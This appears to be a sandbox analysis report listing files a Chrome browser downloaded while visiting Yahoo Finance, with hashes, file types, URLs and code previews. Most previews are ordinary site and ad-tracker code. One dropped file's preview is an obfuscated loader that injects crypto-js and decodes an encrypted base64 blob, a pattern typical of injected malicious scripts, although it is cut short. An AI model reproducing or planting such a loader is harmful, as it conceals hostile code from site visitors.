                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:@keyframes throb{0%{border:2px solid #add8e6;transform:scale(1)}30%{border:1px solid #add8e6;transform:scale(1.8)}50%,to{border:none;transform:scale(2.2)}}.eventQuoteContainer{display:none;position:absolute}.eventQuoteContainer.hover .tooltip,.eventQuoteContainer:hover .tooltip{display:block;z-index:20}.eventQuoteContainer.hide .tooltip{display:none}.eventQuoteContainer.economic.hover name{background-color:#c498e3;z-index:10}.eventQuoteContainer.earning.hover name{background-color:hsla(204,62%,63%,.5);z-index:10}.eventQuoteContainer.carousel.hover name,.eventQuoteContainer.rating.hover name{background-color:hsla(38,91%,69%,.5);z-index:10}.eventQuoteContainer .name{border-radius:50%;color:#fff;cursor:pointer;height:10px;margin-bottom:5px;margin-left:-1.8px;text-align:center;width:10px}.eventQuoteContainer .name:hover{z-index:10}.eventQuoteContainer.economic .name{background-color:#b57edc}.eventQuoteContainer.economic .name:hover{background-color:#c498e3}.eventQuoteContainer.earning .nam
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):153
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.891197699416185
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:JSx/FKn6LZLiLb8yXxAuKUC4XXAwL+LA00JIXTMWQAdVKBUpFR:OwgZrzuKIC90YTXQ4VKBUF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:39B15C27FAEFF9FF07EE1023ED3C4C07
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3C7A27D3914ED42E50B3AF188CE1B9D180EE8668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D577FFA2C93C4E049A3C4A6554B6021FD545A8293A053A8D4E083EBEE35C420A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6FBF7743AA05396DDF7BEF8B23E8BDE02103ED21FC401B954FC2F2B9085143B46F36FDD29EED07C99714A5A1C47CF3BE7C71A504C4F863F4B8F2D88FC03D9E66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadMeta.DU0UCbRu.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{c as o}from"./commonUtil.BWwawKjd.js";async function n(t,e){const[a]=await o(["meta"],t);return a.updateMeta(e),Promise.resolve()}export{n as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (26903)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):42073
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.575196723691079
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:Aymzet0fCpTV0YzixtEXj8hu4t7oxgoPssMxBptKJbhd/uhaPzOCSa76LixzbJr/:XeC3fuolOj9Lsn8Ebu1FtEMw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F89454C79BF2ADE6E881584BE15D9A1F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:253DF17838C921619B6E86BD307296064073FB2E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D23FD1400D54766C6A56A3A04BC2A02C69EA6F4E68CDF99C44A65418E5F4CC84
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D222A9D83E450B8BBDEC181DF5FACFFA7E7E77D9AAC8DBAD77A5795FC18C7A7A3C1FC5B274D44F5809B06A478250E99C91B442F87D6724124F607E853AA6708E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/ResearchReports.JkjKkfCF.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as te,p as Y,k as N,i as _,x as oe,t as Q,h as q,n as X,I as de,e as I,b as L,d as H,f as A,j as V,q as T,l as S,L as G,G as at,m as $,Y as me,H as be,z as ye,K as fe,D as Ee,O as we}from"./scheduler.Dsuh-FKt.js";import{S as ne,i as le,c as K,b as M,m as z,t as p,a as C,d as D,g as J,e as Z}from"./index.CvwOawEI.js";import{e as F,u as st,o as rt}from"./each.CI2tb2RB.js";import{Q as ie,L as _e,s as ge,g as ot,o as it,b as ct,c as ft,l as ut,i as ht,d as dt,e as mt,f as _t,t as Se,a as gt,h as vt,r as pt,j as bt,k as Ce,I as yt,m as Et,C as wt}from"./chartUtil.-voOXoQ6.js";import{g as ae,t as U,ba as St,m as Ct,s as ke,a6 as kt,n as Tt,al as We,Z as It,b as Te,N as Ie}from"./commonUtil.BWwawKjd.js";import{s as Fe,b as Ht,c as Nt,d as Rt}from"./cookieUtil.CNxvneMM.js";import{I as ce}from"./Icon.C8w5V9EK.js";import{S as Xe,O as Je}from"./Select.DMUNtRO-.js";import{S as Ze}from"./settings.Cb3KIuwM.js";import{S as ve}from"./Switch.5Dhu_-MN.js";import{M as $e}from"./MenuSurface.CpHW4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (52965)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):53065
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.287566227073703
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:wel24obn7/HtZDf9MoD9ona5y5uVTAGAzyzC8:D1In7/HtZhXD9onw5bAezC8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CDE9A77058C077F45CD4C6D0DF36AC70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:40B8BE61F2D501D06E3367E562923FB7BDFCE7D2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F7D53FC843FEF16B69F2FD332C89A6B92207A944ED68F7C27411D9946358A82C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1222A3484419D4328D307784E1004BF4B36F12C48D750659E7E95B211CD4BF4AC31767BA199CB2FCE3E086FCF865D6B4EC47157AF32A25F7ADED035AE326799B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-60a025ce.2db2c45d4d038eecd19e.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-60a025ce.2db2c45d4d038eecd19e.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[7023],{1414:(e,t,a)=>{var i=a(4603);function r(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);t&&(i=i.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),a.push.apply(a,i)}return a}function n(e){for(var t=1;t<arguments.length;t++){var a=null!=arguments[t]?arguments[t]:{};t%2?r(Object(a),!0).forEach((function(t){s(e,t,a[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(a)):r(Object(a)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(a,t))}))}return e}function s(e,t,a){return(t=function(e){var t=function(e,t){if("object"!=typeof e||!e)return e;var a=e[Symbol.toPrimitive];if(void 0!==a){var i=a.call(e,t||"default");if("object"!=typeof i)retur
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsvnElUdjZ49w8F4xUEDrvSdq8pBccTc3kMFLVfKmVlScdHg1cz6m9NSSpT7cuDTqlWUW-OpMy81Zuhevf1Esw5SI0XFltfN2YD9nwKNdjUzUE6anmiwSqspzUywZwGW6lCUZvvu1REJDONwseyIoMD59GZl-dmpUHsU9KJei2TIw-xXL3ZO-afTjgD_qxuHyDsZAw&sig=Cg0ArKJSzFHETDoJKhDxEAE&id=lidar2&mcvt=1001&p=24,146,274,1116&tm=29879.399999999965&tu=28878.70000000001&mtos=1001,1001,1001,1001,1001&tos=1001,0,0,0,0&v=20240925&bin=7&avms=nio&bs=0,0&mc=1&if=1&vu=1&app=0&itpl=19&adk=1820292226&rs=4&la=1&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0%3D&vs=4&r=v&co=2364972800&rst=1727716926926&rpt=30135&isd=0&lsd=0&met=ce&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (14394)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):14706
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4205091835205925
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:ys9X0SCg8UoDthaNyvhCV/KJKWrKFKiL2LKIQNvdNFKlRCLJTsK54:tdCDLDthDQL2IwR8TC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D4B1B65CB91E146E8AD42571060AFDAC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:08BA322F600D9B6927A25EF9E9E426D946CDB624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:45F8135B8AEEDEFF283C4057E5056C6839A30B380F13E3D663A1A0AF7FB7C7D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B025AD62FD0F8686038A9DC73703CAC0964D492ED075B755770AA2935DEBA36EE051B9EBB357EA664AFE3EC08EF678E2C692360A53CE73EA1C62779A4EB432A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://gum.criteo.com/syncframe?origin=publishertag&topUrl=finance.yahoo.com&gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<head>. <script type="text/javascript">. window.CONFIG_CSM_DOMAIN_NAME = "csm.nl3.eu.criteo.net";. window.CONFIG_CSM_RATIO = 100;. window.GUM_DOMAIN = "gum.criteo.com";. </script>. <script type="text/javascript">. !function(){"use strict";var i=function(t,e){return(i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n])})(t,e)};function t(t,e){function n(){this.constructor=t}i(t,e),t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)}var e=function(){return(e=Object.assign||function(t){for(var e,n=1,i=arguments.length;n<i;n++)for(var o in e=arguments[n])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t}).apply(this,arguments)};function n(r,s,a,l){return new(a=a||Promise)(function(t,e){function n(t){try{o(l.next(t))}catch(t){e(t)}}function i(t){try{o(l.throw(t))}catch(t){e(t)}}function o(e){e.done?t(e.valu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (14394)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):14706
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4205091835205925
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:ys9X0SCg8UoDthaNyvhCV/KJKWrKFKiL2LKIQNvdNFKlRCLJTsK54:tdCDLDthDQL2IwR8TC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D4B1B65CB91E146E8AD42571060AFDAC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:08BA322F600D9B6927A25EF9E9E426D946CDB624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:45F8135B8AEEDEFF283C4057E5056C6839A30B380F13E3D663A1A0AF7FB7C7D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B025AD62FD0F8686038A9DC73703CAC0964D492ED075B755770AA2935DEBA36EE051B9EBB357EA664AFE3EC08EF678E2C692360A53CE73EA1C62779A4EB432A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://gum.criteo.com/syncframe?origin=publishertag&topUrl=www.yahoo.com&gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<head>. <script type="text/javascript">. window.CONFIG_CSM_DOMAIN_NAME = "csm.nl3.eu.criteo.net";. window.CONFIG_CSM_RATIO = 100;. window.GUM_DOMAIN = "gum.criteo.com";. </script>. <script type="text/javascript">. !function(){"use strict";var i=function(t,e){return(i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n])})(t,e)};function t(t,e){function n(){this.constructor=t}i(t,e),t.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)}var e=function(){return(e=Object.assign||function(t){for(var e,n=1,i=arguments.length;n<i;n++)for(var o in e=arguments[n])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t}).apply(this,arguments)};function n(r,s,a,l){return new(a=a||Promise)(function(t,e){function n(t){try{o(l.next(t))}catch(t){e(t)}}function i(t){try{o(l.throw(t))}catch(t){e(t)}}function o(e){e.done?t(e.valu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1387)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3134380778386
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:DAHWZXsvVR/fGp1CUFsRR+rdIighdIw/ErXp4O8Xb0s8yH330YjT7FOXsA:DAHlvVRnGp1CUFsRUtgPEr521df7LA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8860FFB26156A80CD6EF43CB27678F8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6263757A5038E45657418D59B9CCFFF15AA217EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C05BBFCE049CD908938C2D96D589858823D70F37CEC9AF6B5928E5AA457E64FB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B70BED158E1956FA15A30EC14CB5A4E371781FABDB67A3E0FD77DB1E2E4B86022CCB013B5E85DA453D02DC7457972D90C3140EC91116D561B8CE1B09A75E88D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadQuoteType.ol0a8pjs.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{l,f as L}from"./logUtil.CCV3qKPL.js";import{c as x}from"./commonUtil.BWwawKjd.js";async function E(a,{symbol:t,silent:i=!1}){var d;if(!t){const e=new Error("Bad request for loadQuoteType");return l(a,{silent:i,symbol:t},{data:e,perfLabel:"loadQuoteType"}),Promise.reject(e)}const[n]=await x(["quote"],a),r=n.getQuoteSummary(t);if(r!=null&&r.quoteType)return r.quoteType;const s=n.getQuote(t);if(s){const e=s.quoteType,o=Object(e)===e?e:s,{exchange:T,exchangeTimezoneName:q,exchangeTimezoneShortName:y,gmtOffSetMilliseconds:c,longName:g,market:h,messageBoardId:m,quoteType:Q,shortName:v,isEsgPopulated:F,sectorKey:w,industryKey:N}=o,p={exchange:T,exchangeTimezoneName:q,exchangeTimezoneShortName:y,gmtOffSetMilliseconds:c==null?void 0:c.toString(),longName:g,market:h,messageBoardId:m,quoteType:Q,shortName:v,symbol:t};if(Object.values(p).every(f=>f!==void 0)){const S=Object.entries({industryKey:N,isEsgPopulated:F,sectorKey:w}).filter(([,u])=>u!==void 0).reduce((u,[O,j])=>(u[O]=j,u),{});retu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1425), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2061
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.974051347925353
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:ZuHPfzBplX9cLxfLT/pDaDC8VsJ1fhYwdxWNTjtrriEyK4iY0HE6nzz/VggCLsTy:k7bz+v1aDfs5YgWNkpipnuHVQQuIkob
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BC5027C7E8267990D370F001C5BF42CE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A9A6FB595B223ED34781E2713769FFC17BF7E31E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:86CC2D666203FA69637F97BFCF1404918940B5F3B738797FAE35AAEC9900D41D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:980BA150CC0F7458623F868F86FFD3CF484DC716E9C8376805E854261B6739C509880A9ED0CDA00203A2E29A37220E90AB2B5C7CED79120525E0994D879A5480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview: var diDVmDTGABbkYSov = document.createElement("script");..diDVmDTGABbkYSov.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(diDVmDTGABbkYSov);..diDVmDTGABbkYSov.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoidUlGVTdwS0drRXRkU1h6XC9LNndYVFB5NXhQQ1lYWFJVeEc3Q3ZWbkZyZFVEYUZKalVYWllMY1VqQ0JvK2dkZWlyQlJPVXN6Vlo4N2FuakRxNmZcL1VGNUpkQndPZEpQd2RWZ1lDTTBYbHhxUzJiVnNIcmVWa2NqWGlqYW9vWTRHMjk5Sk00a0s1aHhaOXJPMlwvdmZWbys3Y2JkVG1WMWswckl1bWREMWQ4U01SaU9WRVhuZEdXb0lDMUhxK1hIUkIxdTNzSHpzRGNVWDJMbFJaVklRSERLOCt3U01CZm1Tb1JzdFhzN0o0T0dmYUo5SjJmdlBKc05HMm91dnBwaEZSVnlRZ0FSNnNpb1JIVmY4a3YwOXI1ajRPR25TSjNrS0tZd1wvS3dmYzVGbDdRclwvT0ZZNDdcL0VONmhObmd5dCtWMWJFblZBUVpDQ1wveHlPM1cyaVFsK1wvSFNjZlwvZjBMeEdTTFVoeWl6VlZOSFVMblJFVmlUdVhwRFA0aE1mbXVTa1pLb0RcLzh4UWtjTkR3MEpRUHhDbk1ybmNCQ2tiK2RaNWlSSVloV1VGUGVkZTdkTTZ0K3hJUGVYYnMyVndQZ09cL0RrdW5aVVN0bUpjMThRZnZoN0lPWDFxNWhpaHh0d3dPK0xvNzdrT3FkcE80bFwvYmRMMHJcL0pEVUZcL3M3aEtYRFwvV1wvcF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (30997)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):31091
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.69327733008626
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:arQmyNVTN9qyRwCBqFW8ayBrXnaxlYuG836HOS:4qqGupVBzHuG83G
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0C89D5D9B4467B7C5C6EAB7B8A42AB2A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:09219346A9BA43F12A792C54D7AA519A509F71B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8007054CBB687DA8DEC06ED56B8F995E4167368F27718BDCD1E3BF8020CDF69A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7327E76F8E50BC37403ACB8845C43B4FECE69B6525EC1ED5827AFF188421B850595B4F59BEFAB1A56064BE23A9E8949634F69F088A8728F619C2037C509246DA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/common-28a36deb.054eec876215d316883d.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-28a36deb.054eec876215d316883d.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[6656],{5873:(t,e,a)=>{var i,r,o=a(4603);function l(){}l[15315]=function(){for(var t=2;9!==t;)switch(t){case 2:t="object"==typeof globalThis?1:5;break;case 1:return globalThis;case 5:var e;try{for(var a=2;6!==a;)switch(a){case 9:delete e.vfyLt,delete Object.prototype.gLJnH,a=6;break;case 3:throw"";case 4:a="undefined"==typeof vfyLt?3:9;break;case 2:Object.defineProperty(Object.prototype,"gLJnH",{get:function(){return this},configurable:!0}),(e=gLJnH).vfyLt=e,a=4}}catch(i){e=window}return e}}(),function(t){function e(t){for(;;){return[arguments][0][0].Function}}for(var a=2;81!==a;)switch(a){case 24:i[13]="z",i[73]="",i[73]="4",i[19]="H7N",a=35;break;case 86:r(o,"test",i[24],i[22]),a=85;break;case 83:r(h,i[56],i[67],i[79]),a=82;break;case 47:i[78]=i[77],i[78]+=i[77],i[78]+=i[26],i[79]=i[25],a=64;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 536x284, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43086
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.968111202065225
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:CT0mekJXcczh88lFWh3KduZXinlG+oLz/UR9pvYdrwOmXCrP4uMYGuKCnuCyPUW8:GLekZowWxKduZso+o//C95YdkcP4uMLk
